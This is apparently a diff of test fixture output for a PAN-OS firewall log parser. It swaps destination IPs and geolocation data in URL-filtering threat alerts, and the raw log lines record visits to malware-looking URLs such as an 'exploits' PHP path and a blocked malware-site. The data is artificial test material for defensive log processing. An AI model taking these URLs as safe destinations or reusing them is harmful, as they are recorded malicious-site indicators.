+        "event.original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:57,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25848,1,59317,80,0,0,0x208000,tcp,alert,\"lsiu.info/evo/exploits/x19.php?o=2&t=1241403746&i=1365814122\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html",
         "event.outcome": "success",
         "event.severity": 5,
         "event.timezone": "-02:00",
@@ -548,9 +524,9 @@
         "labels.captive_portal": true,
         "labels.container_page": true,
         "log.level": "informational",
-        "log.offset": 2076,
+        "log.offset": 2066,
         "network.application": "web-browsing",
-        "network.community_id": "1:GOqfpUTezPkpm6axBI22kY90kU4=",
+        "network.community_id": "1:fmI3tKXdcqsY5PoHvFSPPOmDSOc=",
         "network.direction": "inbound",
         "network.transport": "tcp",
         "observer.egress.interface.name": "ethernet1/1",
@@ -585,13 +561,13 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.2",
-            "204.232.231.46"
+            "67.43.156.12"
         ],
         "related.user": [
             "crusher"
         ],
         "rule.name": "rule1",
-        "server.ip": "204.232.231.46",
+        "server.ip": "67.43.156.12",
         "server.port": 80,
         "service.type": "panw",
         "source.address": "192.168.0.2",
@@ -615,19 +591,15 @@
         "client.ip": "192.168.0.2",
         "client.port": 59302,
         "client.user.name": "crusher",
-        "destination.address": "204.232.231.46",
-        "destination.as.number": 27357,
-        "destination.as.organization.name": "Rackspace Hosting",
-        "destination.geo.city_name": "Fort Lauderdale",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 26.1792,
-        "destination.geo.location.lon": -80.1749,
+        "destination.address": "67.43.156.12",
+        "destination.as.number": 35908,
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "BT",
+        "destination.geo.country_name": "Bhutan",
+        "destination.geo.location.lat": 27.5,
+        "destination.geo.location.lon": 90.5,
         "destination.geo.name": "United States",
-        "destination.geo.region_iso_code": "US-FL",
-        "destination.geo.region_name": "Florida",
-        "destination.ip": "204.232.231.46",
+        "destination.ip": "67.43.156.12",
         "destination.port": 80,
         "event.action": "url_filtering",
         "event.category": [
@@ -638,7 +610,7 @@
         "event.dataset": "panw.panos",
         "event.kind": "alert",
         "event.module": "panw",
-        "event.original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,THREAT,url,1,2012/04/10 04:39:54,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,24910,1,59302,80,0,0,0x208000,tcp,alert,\"liteautobestguide.cn/load.php\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html",
+        "event.original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,THREAT,url,1,2012/04/10 04:39:54,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,24910,1,59302,80,0,0,0x208000,tcp,alert,\"liteautobestguide.cn/load.php\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html",
         "event.outcome": "success",
         "event.severity": 5,
         "event.timezone": "-02:00",
@@ -650,9 +622,9 @@
         "labels.captive_portal": true,
         "labels.container_page": true,
         "log.level": "informational",
-        "log.offset": 2519,
+        "log.offset": 2507,
         "network.application": "web-browsing",
-        "network.community_id": "1:22ouAyA1O0KgUQOEKP20E7gNa2U=",
+        "network.community_id": "1:vAUMECfwOw0ZMjDh547rBQbLCC0=",
         "network.direction": "inbound",
         "network.transport": "tcp",
         "observer.egress.interface.name": "ethernet1/1",
@@ -687,13 +659,13 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.2",
-            "204.232.231.46"
+            "67.43.156.12"
         ],
         "related.user": [
             "crusher"
         ],
         "rule.name": "rule1",
-        "server.ip": "204.232.231.46",
+        "server.ip": "67.43.156.12",
         "server.port": 80,
         "service.type": "panw",
         "source.address": "192.168.0.2",
@@ -716,19 +688,15 @@
         "client.ip": "192.168.0.2",
         "client.port": 59301,
         "client.user.name": "crusher",
-        "destination.address": "204.232.231.46",
-        "destination.as.number": 27357,
-        "destination.as.organization.name": "Rackspace Hosting",
-        "destination.geo.city_name": "Fort Lauderdale",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 26.1792,
-        "destination.geo.location.lon": -80.1749,
+        "destination.address": "67.43.156.12",
+        "destination.as.number": 35908,
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "BT",
+        "destination.geo.country_name": "Bhutan",
+        "destination.geo.location.lat": 27.5,
+        "destination.geo.location.lon": 90.5,
         "destination.geo.name": "United States",
-        "destination.geo.region_iso_code": "US-FL",
-        "destination.geo.region_name": "Florida",
-        "destination.ip": "204.232.231.46",
+        "destination.ip": "67.43.156.12",
         "destination.port": 80,
         "event.action": "url_filtering",
         "event.category": [
@@ -739,7 +707,7 @@
         "event.dataset": "panw.panos",
         "event.kind": "alert",
         "event.module": "panw",
-        "event.original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,THREAT,url,1,2012/04/10 04:39:54,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26862,1,59301,80,0,0,0x208000,tcp,alert,\"liteautobestguide.cn/index.php\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html",
+        "event.original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,THREAT,url,1,2012/04/10 04:39:54,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26862,1,59301,80,0,0,0x208000,tcp,alert,\"liteautobestguide.cn/index.php\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html",
         "event.outcome": "success",
         "event.severity": 5,
         "event.timezone": "-02:00",
@@ -751,9 +719,9 @@
         "labels.captive_portal": true,
         "labels.container_page": true,
         "log.level": "informational",
-        "log.offset": 2931,
+        "log.offset": 2917,
         "network.application": "web-browsing",
-        "network.community_id": "1:phQpgsVhj3YxNYzeNkqdzDgcMCg=",
+        "network.community_id": "1:NUjNq/OVSu47ikA9lKKSraDM5HU=",
         "network.direction": "inbound",
         "network.transport": "tcp",
         "observer.egress.interface.name": "ethernet1/1",
@@ -788,13 +756,13 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.2",
-            "204.232.231.46"
+            "67.43.156.12"
         ],
         "related.user": [
             "crusher"
         ],
         "rule.name": "rule1",
-        "server.ip": "204.232.231.46",
+        "server.ip": "67.43.156.12",
         "server.port": 80,
         "service.type": "panw",
         "source.address": "192.168.0.2",
@@ -817,19 +785,15 @@
         "client.ip": "192.168.0.2",
         "client.port": 59303,
         "client.user.name": "crusher",
-        "destination.address": "204.232.231.46",
-        "destination.as.number": 27357,
-        "destination.as.organization.name": "Rackspace Hosting",
-        "destination.geo.city_name": "Fort Lauderdale",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 26.1792,
-        "destination.geo.location.lon": -80.1749,
+        "destination.address": "67.43.156.12",
+        "destination.as.number": 35908,
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "BT",
+        "destination.geo.country_name": "Bhutan",
+        "destination.geo.location.lat": 27.5,
+        "destination.geo.location.lon": 90.5,
         "destination.geo.name": "United States",
-        "destination.geo.region_iso_code": "US-FL",
-        "destination.geo.region_name": "Florida",
-        "destination.ip": "204.232.231.46",
+        "destination.ip": "67.43.156.12",
         "destination.port": 80,
         "event.action": "url_filtering",
         "event.category": [
@@ -840,7 +804,7 @@
         "event.dataset": "panw.panos",
         "event.kind": "alert",
         "event.module": "panw",
-        "event.original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,THREAT,url,1,2012/04/10 04:39:55,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,22860,1,59303,80,0,0,0x208000,tcp,alert,\"litetopdetect.cn/index.php\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html",
+        "event.original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,THREAT,url,1,2012/04/10 04:39:55,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,22860,1,59303,80,0,0,0x208000,tcp,alert,\"litetopdetect.cn/index.php\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html",
         "event.outcome": "success",
         "event.severity": 5,
         "event.timezone": "-02:00",
@@ -852,9 +816,9 @@
         "labels.captive_portal": true,
         "labels.container_page": true,
         "log.level": "informational",
-        "log.offset": 3344,
+        "log.offset": 3328,
         "network.application": "web-browsing",
-        "network.community_id": "1:6kV576B7jMsBLC62npA6Dgi/zMI=",
+        "network.community_id": "1:zikh1dISky6Bvrt3EQgtSiB7tFM=",
         "network.direction": "inbound",
         "network.transport": "tcp",
         "observer.egress.interface.name": "ethernet1/1",
@@ -889,13 +853,13 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.2",
-            "204.232.231.46"
+            "67.43.156.12"
         ],
         "related.user": [
             "crusher"
         ],
         "rule.name": "rule1",
-        "server.ip": "204.232.231.46",
+        "server.ip": "67.43.156.12",
         "server.port": 80,
         "service.type": "panw",
         "source.address": "192.168.0.2",
@@ -918,19 +882,15 @@
         "client.ip": "192.168.0.2",
         "client.port": 59304,
         "client.user.name": "crusher",
-        "destination.address": "204.232.231.46",
-        "destination.as.number": 27357,
-        "destination.as.organization.name": "Rackspace Hosting",
-        "destination.geo.city_name": "Fort Lauderdale",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 26.1792,
-        "destination.geo.location.lon": -80.1749,
+        "destination.address": "67.43.156.12",
+        "destination.as.number": 35908,
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "BT",
+        "destination.geo.country_name": "Bhutan",
+        "destination.geo.location.lat": 27.5,
+        "destination.geo.location.lon": 90.5,
         "destination.geo.name": "United States",
-        "destination.geo.region_iso_code": "US-FL",
-        "destination.geo.region_name": "Florida",
-        "destination.ip": "204.232.231.46",
+        "destination.ip": "67.43.156.12",
         "destination.port": 80,
         "event.action": "url_filtering",
         "event.category": [
@@ -941,7 +901,7 @@
         "event.dataset": "panw.panos",
         "event.kind": "alert",
         "event.module": "panw",
-        "event.original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,THREAT,url,1,2012/04/10 04:39:55,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26360,1,59304,80,0,0,0x208000,tcp,alert,\"lkmpmlm.com/fff9999.php?aid=0&uid=6cbbc5081e7548e276611ff5059df6ed30c8f8f1&os=513\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html",
+        "event.original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,THREAT,url,1,2012/04/10 04:39:55,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26360,1,59304,80,0,0,0x208000,tcp,alert,\"lkmpmlm.com/fff9999.php?aid=0&uid=6cbbc5081e7548e276611ff5059df6ed30c8f8f1&os=513\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html",
         "event.outcome": "success",
         "event.severity": 5,
         "event.timezone": "-02:00",
@@ -953,9 +913,9 @@
         "labels.captive_portal": true,
         "labels.container_page": true,
         "log.level": "informational",
-        "log.offset": 3753,
+        "log.offset": 3735,
         "network.application": "web-browsing",
-        "network.community_id": "1:h+XKHvMK2Oz7QQvaJdhsJWE2c9E=",
+        "network.community_id": "1:JJMt5TnGAbJ3hOj5OyWJMZSrCkI=",
         "network.direction": "inbound",
         "network.transport": "tcp",
         "observer.egress.interface.name": "ethernet1/1",
@@ -990,13 +950,13 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.2",
-            "204.232.231.46"
+            "67.43.156.12"
         ],
         "related.user": [
             "crusher"
         ],
         "rule.name": "rule1",
-        "server.ip": "204.232.231.46",
+        "server.ip": "67.43.156.12",
         "server.port": 80,
         "service.type": "panw",
         "source.address": "192.168.0.2",
@@ -1020,19 +980,15 @@
         "client.ip": "192.168.0.2",
         "client.port": 59297,
         "client.user.name": "crusher",
-        "destination.address": "204.232.231.46",
-        "destination.as.number": 27357,
-        "destination.as.organization.name": "Rackspace Hosting",
-        "destination.geo.city_name": "Fort Lauderdale",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 26.1792,
-        "destination.geo.location.lon": -80.1749,
+        "destination.address": "67.43.156.12",
+        "destination.as.number": 35908,
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "BT",
+        "destination.geo.country_name": "Bhutan",
+        "destination.geo.location.lat": 27.5,
+        "destination.geo.location.lon": 90.5,
         "destination.geo.name": "United States",
-        "destination.geo.region_iso_code": "US-FL",
-        "destination.geo.region_name": "Florida",
-        "destination.ip": "204.232.231.46",
+        "destination.ip": "67.43.156.12",
         "destination.port": 80,
         "event.action": "url_filtering",
         "event.category": [
@@ -1043,7 +999,7 @@
         "event.dataset": "panw.panos",
         "event.kind": "alert",
         "event.module": "panw",
-        "event.original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,THREAT,url,1,2012/04/10 04:39:52,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25543,1,59297,80,0,0,0x208000,tcp,alert,\"girlteenxxxfreemov.com/\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html",
+        "event.original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,THREAT,url,1,2012/04/10 04:39:52,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25543,1,59297,80,0,0,0x208000,tcp,alert,\"girlteenxxxfreemov.com/\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html",
         "event.outcome": "success",
         "event.severity": 5,
         "event.timezone": "-02:00",
@@ -1055,9 +1011,9 @@
         "labels.captive_portal": true,
         "labels.container_page": true,
         "log.level": "informational",
-        "log.offset": 4217,
+        "log.offset": 4197,
         "network.application": "web-browsing",
-        "network.community_id": "1:Sa+u435/AIAAeEelFduJmiGLOv0=",
+        "network.community_id": "1:rIUUZipsjZe9D+20GocGgeotUX8=",
         "network.direction": "inbound",
         "network.transport": "tcp",
         "observer.egress.interface.name": "ethernet1/1",
@@ -1092,13 +1048,13 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.2",
-            "204.232.231.46"
+            "67.43.156.12"
         ],
         "related.user": [
             "crusher"
         ],
         "rule.name": "rule1",
-        "server.ip": "204.232.231.46",
+        "server.ip": "67.43.156.12",
         "server.port": 80,
         "service.type": "panw",
         "source.address": "192.168.0.2",
@@ -1120,19 +1076,15 @@
         "client.ip": "192.168.0.2",
         "client.port": 59299,
         "client.user.name": "crusher",
-        "destination.address": "204.232.231.46",
-        "destination.as.number": 27357,
-        "destination.as.organization.name": "Rackspace Hosting",
-        "destination.geo.city_name": "Fort Lauderdale",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 26.1792,
-        "destination.geo.location.lon": -80.1749,
+        "destination.address": "67.43.156.12",
+        "destination.as.number": 35908,
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "BT",
+        "destination.geo.country_name": "Bhutan",
+        "destination.geo.location.lat": 27.5,
+        "destination.geo.location.lon": 90.5,
         "destination.geo.name": "United States",
-        "destination.geo.region_iso_code": "US-FL",
-        "destination.geo.region_name": "Florida",
-        "destination.ip": "204.232.231.46",
+        "destination.ip": "67.43.156.12",
         "destination.port": 80,
         "event.action": "url_filtering",
         "event.category": [
@@ -1143,7 +1095,7 @@
         "event.dataset": "panw.panos",
         "event.kind": "alert",
         "event.module": "panw",
-        "event.original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,THREAT,url,1,2012/04/10 04:39:53,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,25437,1,59299,80,0,0,0x208000,tcp,alert,\"imagesrepository.com/resolution.php\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html",
+        "event.original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,THREAT,url,1,2012/04/10 04:39:53,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,25437,1,59299,80,0,0,0x208000,tcp,alert,\"imagesrepository.com/resolution.php\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html",
         "event.outcome": "success",
         "event.severity": 5,
         "event.timezone": "-02:00",
@@ -1155,9 +1107,9 @@
         "labels.captive_portal": true,
         "labels.container_page": true,
         "log.level": "informational",
-        "log.offset": 4623,
+        "log.offset": 4601,
         "network.application": "web-browsing",
-        "network.community_id": "1:C9009xCOuCuGvMPT4caMCizoYr0=",
+        "network.community_id": "1:iwp6f2j4DuzqklbsQ3X/ysmCjlM=",
         "network.direction": "inbound",
         "network.transport": "tcp",
         "observer.egress.interface.name": "ethernet1/1",
@@ -1192,13 +1144,13 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.2",
-            "204.232.231.46"
+            "67.43.156.12"
         ],
         "related.user": [
             "crusher"
         ],
         "rule.name": "rule1",
-        "server.ip": "204.232.231.46",
+        "server.ip": "67.43.156.12",
         "server.port": 80,
         "service.type": "panw",
         "source.address": "192.168.0.2",
@@ -1221,19 +1173,15 @@
         "client.ip": "192.168.0.2",
         "client.port": 59298,
         "client.user.name": "crusher",
-        "destination.address": "204.232.231.46",
-        "destination.as.number": 27357,
-        "destination.as.organization.name": "Rackspace Hosting",
-        "destination.geo.city_name": "Fort Lauderdale",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 26.1792,
-        "destination.geo.location.lon": -80.1749,
+        "destination.address": "67.43.156.12",
+        "destination.as.number": 35908,
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "BT",
+        "destination.geo.country_name": "Bhutan",
+        "destination.geo.location.lat": 27.5,
+        "destination.geo.location.lon": 90.5,
         "destination.geo.name": "United States",
-        "destination.geo.region_iso_code": "US-FL",
-        "destination.geo.region_name": "Florida",
-        "destination.ip": "204.232.231.46",
+        "destination.ip": "67.43.156.12",
         "destination.port": 80,
         "event.action": "url_filtering",
         "event.category": [
@@ -1244,7 +1192,7 @@
         "event.dataset": "panw.panos",
         "event.kind": "alert",
         "event.module": "panw",
-        "event.original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,THREAT,url,1,2012/04/10 04:39:53,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,26338,1,59298,80,0,0,0x208000,tcp,alert,\"hottestfiles.com/search/search.php?q=xxx\",(9999),search-engines,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html",
+        "event.original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,THREAT,url,1,2012/04/10 04:39:53,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,26338,1,59298,80,0,0,0x208000,tcp,alert,\"hottestfiles.com/search/search.php?q=xxx\",(9999),search-engines,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html",
         "event.outcome": "success",
         "event.severity": 5,
         "event.timezone": "-02:00",
@@ -1256,9 +1204,9 @@
         "labels.captive_portal": true,
         "labels.container_page": true,
         "log.level": "informational",
-        "log.offset": 5041,
+        "log.offset": 5017,
         "network.application": "web-browsing",
-        "network.community_id": "1:BG6Rk6e+H9jRcZHXqRPFG4iA3uU=",
+        "network.community_id": "1:s7wyS51RPURVN0hpBPCJ/Lberv0=",
         "network.direction": "inbound",
         "network.transport": "tcp",
         "observer.egress.interface.name": "ethernet1/1",
@@ -1293,13 +1241,13 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.2",
-            "204.232.231.46"
+            "67.43.156.12"
         ],
         "related.user": [
             "crusher"
         ],
         "rule.name": "rule1",
-        "server.ip": "204.232.231.46",
+        "server.ip": "67.43.156.12",
         "server.port": 80,
         "service.type": "panw",
         "source.address": "192.168.0.2",
@@ -1323,19 +1271,15 @@
         "client.ip": "192.168.0.2",
         "client.port": 59300,
         "client.user.name": "crusher",
-        "destination.address": "204.232.231.46",
-        "destination.as.number": 27357,
-        "destination.as.organization.name": "Rackspace Hosting",
-        "destination.geo.city_name": "Fort Lauderdale",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 26.1792,
-        "destination.geo.location.lon": -80.1749,
+        "destination.address": "67.43.156.12",
+        "destination.as.number": 35908,
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "BT",
+        "destination.geo.country_name": "Bhutan",
+        "destination.geo.location.lat": 27.5,
+        "destination.geo.location.lon": 90.5,
         "destination.geo.name": "United States",
-        "destination.geo.region_iso_code": "US-FL",
-        "destination.geo.region_name": "Florida",
-        "destination.ip": "204.232.231.46",
+        "destination.ip": "67.43.156.12",
         "destination.port": 80,
         "event.action": "url_filtering",
         "event.category": [
@@ -1346,7 +1290,7 @@
         "event.dataset": "panw.panos",
         "event.kind": "alert",
         "event.module": "panw",
-        "event.original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,THREAT,url,1,2012/04/10 04:39:54,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,25713,1,59300,80,0,0,0x200000,tcp,block-url,\"infodist1.com/in.cgi?11&parameter=404\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,",
+        "event.original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,THREAT,url,1,2012/04/10 04:39:54,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,25713,1,59300,80,0,0,0x200000,tcp,block-url,\"infodist1.com/in.cgi?11&parameter=404\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,",
         "event.outcome": "success",
         "event.severity": 5,
         "event.timezone": "-02:00",
@@ -1357,9 +1301,9 @@
         "input.type": "log",
         "labels.captive_portal": true,
         "log.level": "informational",
-        "log.offset": 5466,
+        "log.offset": 5440,
         "network.application": "web-browsing",
-        "network.community_id": "1:YDMNSbru670DK5EMT3E28WFJPz4=",
+        "network.community_id": "1:p332Xv4lcmlBtHbVIre7h23l+pw=",
         "network.direction": "inbound",
         "network.transport": "tcp",
         "observer.egress.interface.name": "ethernet1/1",
@@ -1394,13 +1338,13 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.2",
-            "204.232.231.46"
+            "67.43.156.12"
         ],
         "related.user": [
             "crusher"
         ],
         "rule.name": "rule1",
-        "server.ip": "204.232.231.46",
+        "server.ip": "67.43.156.12",
         "server.port": 80,
         "service.type": "panw",
         "source.address": "192.168.0.2",
@@ -1424,19 +1368,15 @@
         "client.ip": "192.168.0.2",
         "client.port": 59295,
         "client.user.name": "crusher",
-        "destination.address": "204.232.231.46",
-        "destination.as.number": 27357,
-        "destination.as.organization.name": "Rackspace Hosting",
-        "destination.geo.city_name": "Fort Lauderdale",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 26.1792,
-        "destination.geo.location.lon": -80.1749,
+        "destination.address": "67.43.156.12",
+        "destination.as.number": 35908,
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "BT",
+        "destination.geo.country_name": "Bhutan",
+        "destination.geo.location.lat": 27.5,
+        "destination.geo.location.lon": 90.5,
         "destination.geo.name": "United States",
-        "destination.geo.region_iso_code": "US-FL",
-        "destination.geo.region_name": "Florida",
-        "destination.ip": "204.232.231.46",
+        "destination.ip": "67.43.156.12",
         "destination.port": 80,
         "event.action": "url_filtering",
         "event.category": [
@@ -1447,7 +1387,7 @@
         "event.dataset": "panw.panos",
         "event.kind": "alert",
         "event.module": "panw",
-        "event.original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,THREAT,url,1,2012/04/10 04:39:51,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25451,1,59295,80,0,0,0x208000,tcp,alert,\"cls-softwares.com/suc.php\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html",
+        "event.original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,THREAT,url,1,2012/04/10 04:39:51,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25451,1,59295,80,0,0,0x208000,tcp,alert,\"cls-softwares.com/suc.php\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html",
         "event.outcome": "success",
         "event.severity": 5,
         "event.timezone": "-02:00",
@@ -1459,9 +1399,9 @@
         "labels.captive_portal": true,
         "labels.container_page": true,
         "log.level": "informational",
-        "log.offset": 5882,
+        "log.offset": 5854,
         "network.application": "web-browsing",
-        "network.community_id": "1:AEtFqIuwxZ9TQ3w9m74nOrboCXE=",
+        "network.community_id": "1:BV30Tkuh3C81MwjElomoGcaQISc=",
         "network.direction": "inbound",
         "network.transport": "tcp",
         "observer.egress.interface.name": "ethernet1/1",
@@ -1496,13 +1436,13 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.2",
-            "204.232.231.46"
+            "67.43.156.12"
         ],
         "related.user": [
             "crusher"
         ],
         "rule.name": "rule1",
-        "server.ip": "204.232.231.46",
+        "server.ip": "67.43.156.12",
         "server.port": 80,
         "service.type": "panw",
         "source.address": "192.168.0.2",
@@ -1525,19 +1465,15 @@
         "client.ip": "192.168.0.2",
         "client.port": 59291,
         "client.user.name": "crusher",
-        "destination.address": "204.232.231.46",
-        "destination.as.number": 27357,
-        "destination.as.organization.name": "Rackspace Hosting",
-        "destination.geo.city_name": "Fort Lauderdale",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 26.1792,
-        "destination.geo.location.lon": -80.1749,
+        "destination.address": "67.43.156.12",
+        "destination.as.number": 35908,
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "BT",
+        "destination.geo.country_name": "Bhutan",
+        "destination.geo.location.lat": 27.5,
+        "destination.geo.location.lon": 90.5,
         "destination.geo.name": "United States",
-        "destination.geo.region_iso_code": "US-FL",
-        "destination.geo.region_name": "Florida",
-        "destination.ip": "204.232.231.46",
+        "destination.ip": "67.43.156.12",
         "destination.port": 80,
         "event.action": "url_filtering",
         "event.category": [
@@ -1548,7 +1484,7 @@
         "event.dataset": "panw.panos",
         "event.kind": "alert",
         "event.module": "panw",
